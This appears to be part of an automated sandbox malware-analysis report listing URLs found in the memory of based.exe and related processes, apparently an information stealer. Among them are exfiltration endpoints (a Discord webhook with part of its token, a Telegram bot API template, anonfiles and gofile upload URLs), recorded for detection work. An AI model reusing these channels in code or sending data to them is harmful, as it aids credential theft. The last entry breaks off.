                                  Source: based.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                  Source: based.exe, 00000008.00000002.2383767795.00000273EE538000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
                                  Source: based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
                                  Source: based.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1757107261.00000273ED37D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/uploadrU
                                  Source: based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
                                  Source: based.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1757107261.00000273ED37D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr;
                                  Source: based.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1757107261.00000273ED37D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr;r
                                  Source: based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot%s/%s
                                  Source: based.exe, 00000008.00000002.2381451502.00000273EDC6C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
                                  Source: based.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                  Source: based.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                  Source: based.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                  Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                                  Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                                  Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
                                  Source: based.exe, 00000008.00000003.1757107261.00000273ED37D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                                  Source: based.exe, 00000008.00000002.2379479019.00000273ED490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1264025291794157628/Sz1WQEp-Y2XqBUw8OiovYJ-HSmiCmR36z5iq2VLDwzDIXt2
                                  Source: based.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.1757107261.00000273ED37D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
                                  Source: based.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                                  Source: based.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                  Source: based.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                  Source: based.exe, 00000008.00000002.2379479019.00000273ED490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
                                  Source: based.exe, 00000008.00000003.1751478048.00000273ED2C1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1751208630.00000273ED49F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1752076948.00000273ED2E4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1753162300.00000273ED2E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/BlankOBF
                                  Source: VaTlw2kNGc.exe, 00000001.00000003.1713356841.000001A21EEF4000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713108881.000001A21EED7000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1714275067.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713161017.000001A21EEF2000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713836051.000001A21EEF4000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1709067914.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1714582569.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708290049.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708854333.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000002.1717458875.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708560343.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746827387.000001A050086000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744809631.000001A050084000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1747074153.000001A050095000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000002.1748140847.000001A050099000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746475062.000001A0500BF000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746394971.000001A0500BA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744875342.000001A0500B8000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744645445.000001A050070000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1747169873.000001A0500C3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
                                  Source: VaTlw2kNGc.exe, 00000001.00000002.1717549435.000001A220B58000.00000004.00001000.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1709067914.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708290049.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708854333.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708560343.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000002.1748492866.000001A051C7C000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2377891389.00000273EC858000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
                                  Source: based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
                                  Source: VaTlw2kNGc.exe, 00000001.00000003.1713356841.000001A21EEF4000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713108881.000001A21EED7000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1714275067.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713161017.000001A21EEF2000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713836051.000001A21EEF4000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1709067914.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1714582569.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708290049.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708854333.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000002.1717458875.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708560343.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746827387.000001A050086000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744809631.000001A050084000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1747074153.000001A050095000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000002.1748140847.000001A050099000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746475062.000001A0500BF000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746394971.000001A0500BA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744875342.000001A0500B8000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744645445.000001A050070000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1747169873.000001A0500C3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
                                  Source: VaTlw2kNGc.exe, 00000001.00000003.1713356841.000001A21EEF4000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713108881.000001A21EED7000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1714275067.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713161017.000001A21EEF2000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713836051.000001A21EEF4000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1709067914.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1714582569.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708290049.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708854333.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000002.1717458875.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708560343.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746827387.000001A050086000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744809631.000001A050084000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1747074153.000001A050095000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000002.1748140847.000001A050099000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746475062.000001A0500BF000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746394971.000001A0500BA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744875342.000001A0500B8000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744645445.000001A050070000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1747169873.000001A0500C3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
                                  Source: based.exe, 00000008.00000002.2379479019.00000273ED490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
                                  Source: based.exe, 00000008.00000003.1909237453.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1789613343.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376496051.00000273ED40E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1869157083.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379225122.00000273ED412000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
                                  Source: based.exe, 00000008.00000002.2379592577.00000273ED5B4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
                                  Source: based.exe, 00000008.00000002.2379592577.00000273ED5B4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920S
                                  Source: based.exe, 00000008.00000003.1909237453.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2319649761.00000273ED476000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2378782526.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2354206883.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1852165022.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1909237453.00000273ED2A0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379742963.00000273ED760000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1874644333.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379386136.00000273ED47C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2371538109.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868913203.00000273ED47C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2319744738.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1789613343.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376496051.00000273ED40E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2370626302.00000273ED476000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1869157083.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1787886162.00000273ED46D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379225122.00000273ED412000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                                  Source: based.exe, 00000008.00000003.1909237453.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2319649761.00000273ED476000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1852165022.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379742963.00000273ED760000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1874644333.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379386136.00000273ED47C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2371538109.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868913203.00000273ED47C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2319744738.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1789613343.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376496051.00000273ED40E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2370626302.00000273ED476000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1869157083.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1787886162.00000273ED46D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379225122.00000273ED412000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
                                  Source: based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
                                  Source: based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
                                  Source: based.exe, 00000008.00000002.2378782526.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2354206883.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1909237453.00000273ED2A0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
                                  Source: based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
                                  Source: based.exe, 00000008.00000002.2383767795.00000273EE514000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                                  Source: based.exe, 00000008.00000002.2383767795.00000273EE52C000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2381451502.00000273EDC84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
                                  Source: hacn.exe, 00000007.00000002.1750856272.00007FFDFB78F000.00000002.00000001.01000000.0000000E.sdmp, based.exe, 00000008.00000002.2433044590.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpString found in binary or memory: https://python.org/dev/peps/pep-0263/
                                  Source: based.exe, 00000008.00000002.2378782526.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2354206883.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1909237453.00000273ED2A0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.git
                                  Source: based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/moshiax/minotaur-deepweb/main/image.png
                                  Source: based.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1757107261.00000273ED37D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/moshiax/minotaur-deepweb/main/image.pngz
                                  Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                                  Source: based.exe, 00000008.00000003.1856585098.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1865608051.00000273ED896000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1809552854.00000273ED896000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1865608051.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1809552854.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1823417228.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1841596618.00000273ED896000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868829846.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1841596618.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
                                  Source: based.exe, 00000008.00000003.1792926439.00000273ED855000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1854346088.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1809552854.00000273ED8F2000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868467332.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1819669283.00000273ED8F3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1784489237.00000273ED8F8000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1793559715.00000273ED8F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                                  Source: based.exe, 00000008.00000003.1792926439.00000273ED855000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1909237453.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1789613343.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1869157083.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
                                  Source: based.exe, 00000008.00000003.1854346088.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868467332.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                                  Source: based.exe, 00000008.00000003.2258916763.00000273ED8FD000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2259677546.00000273EDA49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                                  Source: based.exe, 00000008.00000003.2259677546.00000273EDA25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                                  Source: based.exe, 00000008.00000003.2259259730.00000273ED8F8000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2259677546.00000273EDA49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                                  Source: based.exe, 00000008.00000003.2259677546.00000273EDA25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                                  Source: based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
                                  Source: based.exe, 00000008.00000002.2378782526.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2354206883.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1909237453.00000273ED2A0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                                  Source: based.exe, 00000008.00000002.2379592577.00000273ED5B4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
                                  Source: based.exe, 00000008.00000002.2381267066.00000273EDAE0000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379479019.00000273ED490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
                                  Source: based.exe, 00000008.00000002.2381267066.00000273EDAE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningse=Lax0
                                  Source: based.exe, 00000008.00000002.2381451502.00000273EDCB4000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2381451502.00000273EDC84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/
                                  Source: based.exe, 00000008.00000002.2381451502.00000273EDC74000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aliexpress.com/
                                  Source: based.exe, 00000008.00000002.2381451502.00000273EDC6C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.ca/
                                  Source: based.exe, 00000008.00000002.2381451502.00000273EDC6C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/
                                  Source: based.exe, 00000008.00000002.2381451502.00000273EDC6C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
                                  Source: based.exe, 00000008.00000002.2381451502.00000273EDC6C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.de/
                                  Source: based.exe, 00000008.00000002.2381451502.00000273EDC6C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.fr/
                                  Source: based.exe, 00000008.00000002.2381451502.00000273EDC38000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.avito.ru/
                                  Source: VaTlw2kNGc.exe, 00000000.00000003.1702259962.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1732946949.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1734194548.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                                  Source: based.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                                  Source: based.exe, 00000008.00000002.2381451502.00000273EDC84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                                  Source: based.exe, 00000008.00000002.2381451502.00000273EDC38000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/
                                  Source: based.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                  Source: based.exe, 00000008.00000002.2381451502.00000273EDC74000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.leboncoin.fr/
                                  Source: based.exe, 00000008.00000002.2381451502.00000273EDCD8000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.1856585098.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1865608051.00000273ED896000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1914578038.00000273ED8B8000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379592577.00000273ED5B4000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.1809552854.00000273ED896000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2383255606.00000273EE17D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2259259730.00000273ED8B8000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1865608051.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1809552854.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1823417228.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1841596618.00000273ED896000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868829846.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1841596618.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1911931520.00000273EE17E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 